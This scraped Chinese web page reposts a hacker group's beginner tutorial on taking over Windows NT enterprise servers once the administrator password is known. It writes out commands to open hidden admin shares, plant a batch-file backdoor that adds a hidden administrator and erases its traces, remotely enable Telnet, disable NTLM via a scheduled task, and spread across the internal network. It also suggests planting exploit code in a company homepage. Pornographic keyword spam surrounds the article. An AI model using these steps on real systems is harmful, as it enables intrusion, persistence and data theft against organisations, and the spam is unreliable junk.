好湿?好紧?好多水好爽自慰,久久久噜久噜久久综合,成人做爰A片免费看黄冈,机机对机机30分钟无遮挡

主頁 > 知識庫 > NT完全入侵教程(新手篇)

NT完全入侵教程(新手篇)

熱門標簽:寧夏保險智能外呼系統哪家好 溫嶺代理外呼系統 怎么更改地圖標注電話 不同的地圖標注 激戰黃昏地圖標注說明 臨滄移動外呼系統哪家有 隨州銷售外呼系統平臺 防城港市ai電銷機器人 交行外呼系統有哪些
   現在的企業當中一般都是使用的NT系統,也不得不承認,NT系統的確是非常適合企業使用的操作系統,然而“黑客”的攻擊引來了企業信息安全危機……

  得到了NT的管理員密碼還能做什么,還不是想做什么就做什么唄。但到底能做什么呢?能詳細答出來的只怕不會很多,而且很多企業系統管理員就認為密碼為空沒什么,因為他們壓根就不知道“黑客”會怎么做。本文介紹的就是得到NT的管理員密碼以后入侵一個企業計算機群的初級和中級手法,尤其是在一個大型企業當中,企業系統管理員的密碼往往關系著整個公司的信息泄密,以及公司的數據的丟失,嚴重的影響到一個企業的發展和生存。

  首先,我們先假定得到了某個企業的一臺服務器192.168.0.1的Administrator的密碼,而對方沒有關閉139端口。

  1.普通共享資源的入侵

  這種入侵手法可說是NT最簡單的入侵了。隨便在自己機器的哪個窗口的地址欄里輸入“\\192.168.0.1”大概等1-2秒,對方就會要求你輸入用戶名和密碼,輸入所得到的用戶名和密碼以后就可以進入,并可以看到這臺服務器在企業中的共享資源了。由于權限是Admin所以你幾乎可以刪除對方共享資源里的任何東西。(如果設置了共享為只讀那就沒辦法了)

  2.默認及隱藏共享資源的入侵

  在說這種入侵方法之前我先來給大家介紹一個NT的IPC$連接,在默認情況下NT系統有一個特殊的隱藏共享,就是IPC$共享。IPC$是專門用在NT中的一種管道通訊,NT系統之間的通訊大部分都在IPC$通訊中完成的。

  這次手法相對高明一點,但還是很簡單的。不過關鍵還是要看“黑客”如何利用了,有的人可能只能刪刪文件,有的人卻可以利用這個留下后門,以便下次如果密碼改變了后可以利用后門進入。同樣在機器里隨便打開一個窗口,在地址欄輸入“\\192.168.0.1”就會要求輸入密碼,輸入以后所看到的東西和前面介紹的一樣。好了,現在同時也建立好IPC$連接了,其實在提示你輸入密碼時從輸入窗口中也知道了是建立IPC$連接。然后我們再次在地址欄輸入地址,這次輸入的就有點不同了,輸入“\\192.168.0.1\c$”大概過一會就出現了對方C盤里所有的內容了。想看對方D盤嗎?同樣,輸入“\\192.168.0.1\D$”就看見對方D盤了。然后想換這個企業的主頁(假如對方還是一個Web服務器)可以說是輕而易舉。記住由于權限是管理員當然可以寫了,留不留后門就看“黑客”的想法咯。一般他們會在C盤(假設在C:\\WINNT下)建立一個批處理文件,假設文件名為hack.bat,其內容一般為:

  net user hack 1234 /add (建立一個用戶名為hack的用戶,密碼為1234)

  net localgroup administrators hack /add (讓hack也是管理員)

  del C:\Documents and Settings\Administrator\開始\菜單\程序\啟動\hack.lnk (刪除啟動文件夾里的快捷方式消除足跡)

  del c:\winnt\hack.bat (刪除hack.bat這個文件消除足跡)

  這樣當企業系統管理員在下次登陸時就會偷偷的添加一個用戶了。當然其實添加用戶算是一個比較愚蠢的留“后門”的方法了,所以其實很多“黑客”會放一個可以常駐內存的小程序,然后建立一個類似的批處理文件和快捷方式,那么“黑客”基本上可以長期的占有企業中的這臺主機了。

3.IPC$連接入侵的高級手段

  然而每個“黑客”都不可能那么笨,非要一直等到下次企業系統管理員登陸以后才可以占有,往往“黑客”會使用更加巧妙的手法,迅速的留下后門。首先他們還是先建立IPC$連接,連接以后他們會使用各種手法開后門,比如打開Telnet服務,“黑客”怎么打開Telnet服務呢?其實有很多種方法,比如微軟公司自己就出了一個小程序“netsvc.exe”就是專門讓系統管理員在建立IPC$連接以后遠程打開服務用的管理工具,但這個工具到了“黑客”手中自然也成了必不可少的“黑客”工具了。在命令符下輸入“netsvc \\192.168.0.1 telnet /start”大概等5分鐘對方的Telnet服務就打開了,然后“telnet 192.168.0.1”嘿嘿……等!需要NTLM驗證,這下又把“黑客”攔在了外面了,這時他們又會用到一個小程序了,就是專門關閉一個NTLM驗證的程序ntlm.exe。(當然也可以是其他名字)“copy ntlm.exe \\192.168.0.1\admin$\system32”把ntlm.exe復制到對方企業服務器的system32目錄下。復制過去了,可怎么讓他運行呢?當然多的是辦法了。“net time \\192.168.0.1”看看對方系統時間為多少假設為18:00。現在再輸入“at \\192.168.0.1 18:02 ntlm.exe”,等一會后,命令提示符顯示新加任務 ID=1,意思是對方系統在18:02時運行ntlm.exe這個程序,等到18:02以后,然后再“telnet 192.168.0.1”嘿嘿~這回是提示需要輸入用戶和密碼了,輸入所得到的管理員用戶名和密碼以后就成功的Telnet到了企業服務器了……

  不過這樣一下是Netsvc,一下又是At實在是麻煩,現在就介紹另一個方法,首先還是先感謝微軟為NT系統管理員提供的方便的管理功能,這一功能到了“黑客”手中可說是“黑客”的福音,不用“黑客”再這么麻煩的輸入這樣那樣的命令了。建立好IPC$連接以后(IPC$連接果然是一種功能非常強大的管理連接),打開本地計算機里的“計算機管理”,用鼠標右鍵點計算機管理窗口里的“計算機管理(本地)”里面有“連接到另一臺計算機”選擇它,在“名稱”里輸入“192.168.0.1”確定以后,首先你的NT系統會看是否建立IPC$連接,“有”就連接上去了,現在你就可以直接管理192.168.0.1了,比如看他的日志,啟動他的服務(當然包括Telnet了),管理他的IIS,什么都有。多研究一下,連注銷對方系統當前登陸的用戶,重新啟動對方計算機,關閉對方計算機都有,真是強大。NT系統到了“黑客”手中,整個系統都成了一個“黑客”工具了,而且是功能非常強大的“黑客”工具。啟動了Telnet了,可還是要NTLM驗證怎么辦?簡單,在本地計算機建立一個用戶名和密碼相同的用戶,如果已有就把密碼改為相同,然后使用這個用戶在本地重新登陸,“telnet 192.168.0.1”嘿嘿~連密碼都不用輸入了!因為通過NTLM驗證了啊。

  現在那些安全意識差的企業系統管理員們知道了暴露了管理員密碼的危險性了吧?還沒完呢。都到這一步了還沒完?機器都被“黑客”完全控制了呀——是的,還沒完,看吧!

  4.深入入侵

  這一步就需要“黑客”有豐富的經驗,實戰操作能力要求很高,也不再是文字能描述清楚的了,下面就只能粗略的介紹一下。

  “黑客”當然不會僅僅在攻餡一臺服務器以后就立刻罷手了,他會深入入侵你的內網,尤其是在一個企業中,往往都是計算機群。那些商業間諜“黑客”當然就更加的想入侵到企業內部去了。而很多企業系統管理員喜歡把所有的服務器的密碼設為相同,就給“黑客”提供了一個良好的入侵條件。Telnet到對方服務器以后,輸入“net view”企業中整個一個工作組或域的計算機這時都一展無余。同樣在Telnet里建立IPC$連接以后象入侵這臺服務器一樣的入侵了。前面說的建立IPC$連接都是使用的圖形界面,然而這時候已經不再擁有圖形界面了,現在假設企業內網的192.168.0.2的密碼和這臺服務器密碼相同,這時可以使用“net use \\192.168.0.2\IPC$ passwd/user:username”來建立IPC$連接了,然后是映射驅動盤,輸入“net use z: \\192.168.0.2\c$”這樣就把192.168.0.2的C盤映射到192.168.0.1的Z盤去了。輸入“z:”就可以象瀏覽192.168.0.1的硬盤一樣,瀏覽192.168.0.2的C盤。而如果他是商業間諜“黑客”,一旦發現里面有價值的東西自然不用說將來會發生什么事了。當然這往往還算是最好的條件,其實還是有相當一部分企業系統管理員不會把密碼設為一樣的。現在就看網絡的情況了,如果入侵的正好是一臺主域控制器,嘿嘿,那對于商業間諜來說可是高興死了,趕快把自己升級成域管理員,這下整個企業的一個域的機器都落在了他的手中。當然在“黑客”手中這也算是一種非常好的情況,但現在微軟行行色色的漏洞越來越多,同時也根據“黑客”的經驗的多少,決定著入侵內網的機會的大小。

  在一個企業中,往往直接連接Internet的是Web服務器。而一個有耐性的“黑客”,一個想入侵這個企業的商業間諜當然會不惜一切手段入侵,其中一個手法就是利用Web服務。微軟公司在今年出現的MIME漏洞就有很好的利用價值。這里順便介紹一下MIME漏洞,MIME在處理不正常的MIME類型中存在問題,攻擊者可以建立一個包含可執行文件的附件的HTML,E-mail并修改MIME頭,使IE不正確處理這個MIME,而執行所指定的可執行文件附件。有了這個漏洞,“黑客”將會更換Web服務器的主頁,在主頁里把MEMI漏洞攻擊代碼插進HTML中,使得企業內部的員工在瀏覽自己公司主頁時運行指定的程序。(企業內部絕對不可能從來不看自己的主頁的,尤其是企業負責人,他們一般都會不定期的檢查主頁。)那么他們在瀏覽自己的主頁時就無聲無熄的執行了“黑客”所指定的程序,這個程序可能是木馬,也可能同樣是添加用戶的批處理文件。

  由上面可以看出一旦NT系統的密碼泄露是一件多么危險的事情,尤其在一個企業當中。同時一個企業網絡的拓撲是否合理也起著非常重要的作用,并且“黑客”尤其是商業間諜所利用的手法遠遠不只有這些,他們還可以利用其它方式,比如電子郵件等各種途徑來得到企業內部的敏感信息或保密信息。

  5.其它入侵
  
  其它還可以通過3389端口入侵。3389是Win2000系統的自帶的,并且是圖形界面的,遠程管理服務的端口。“黑客”一旦有了管理員密碼,危險性也更加直觀化。另外就是通過IIS的管理入侵,在默認情況下IIS提供一個Web方式的管理服務,在c:\inetpub\wwwroot里有一個叫iisstar.asp的東西,如果可以訪問,而且有管理員密碼(NT4里不是管理員也可以,只要是NT的合法賬號)就可以遠程通過Web方式管理IIS信息服務,然后通過特殊手法進一步控制整個機器,然后是整個企業…… 

  轉載自 黑色行動組

標簽:忻州 無錫 沈陽 哈密 阜陽 青海 紅河 河源

巨人網絡通訊聲明:本文標題《NT完全入侵教程(新手篇)》,本文關鍵詞  完全,入侵,教程,新手,篇,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《NT完全入侵教程(新手篇)》相關的同類信息!
  • 本頁收集關于NT完全入侵教程(新手篇)的相關信息資訊供網民參考!
  • 推薦文章
    主站蜘蛛池模板: 久草视频首页| 亚洲女**尺度毛茸茸| 国产高清毛片| 黄色性生活大片| 国产一卡2卡3卡4卡网站| 国产野战农村对白A片| 漫漫漫画免费漫画入口页面弹窗 | 国产性色AV免费观看在线| 强行交换配乱婬bd动漫| 甘德县| 福利草草影院| 小h片在线| 在教练房被教练嗯啊好猛| 黄蓉的销魂夜1一4| 久久东京伊人一本到鬼色| 美女露%100的尿孔无档图片| REBDB初裸写真在线观看| 他摸着我下面突然伸进去了| 激情美女网站| 免费国产精品丝袜| 普通话对白国产精品一级毛片| 日本无遮挡吸乳视频看看| 日本ab在线| 狂暴高清在线观看免费完整版 | 男的把j伸到女的下面| 男男攻把受cao尿了| 性欧美黑人| Av偷拍一区二区97色伦综合| 香蕉视频97| 韩剧妈妈的朋友6观看| 久久精品韩国三级| 中文字幕无码欧美毛片小说| 久久久亚洲熟妇熟女ⅩXXX蜜| 中国老太毛茸茸| 女的扒开尿口让男人桶| 性饥饿的女邻居阿?5| 免费看成人做XXOO视频图片| 国产日产亚洲系列首页| jizz日本护士| 八戒八戒www观看| 日韩亚洲毛片无码不卡|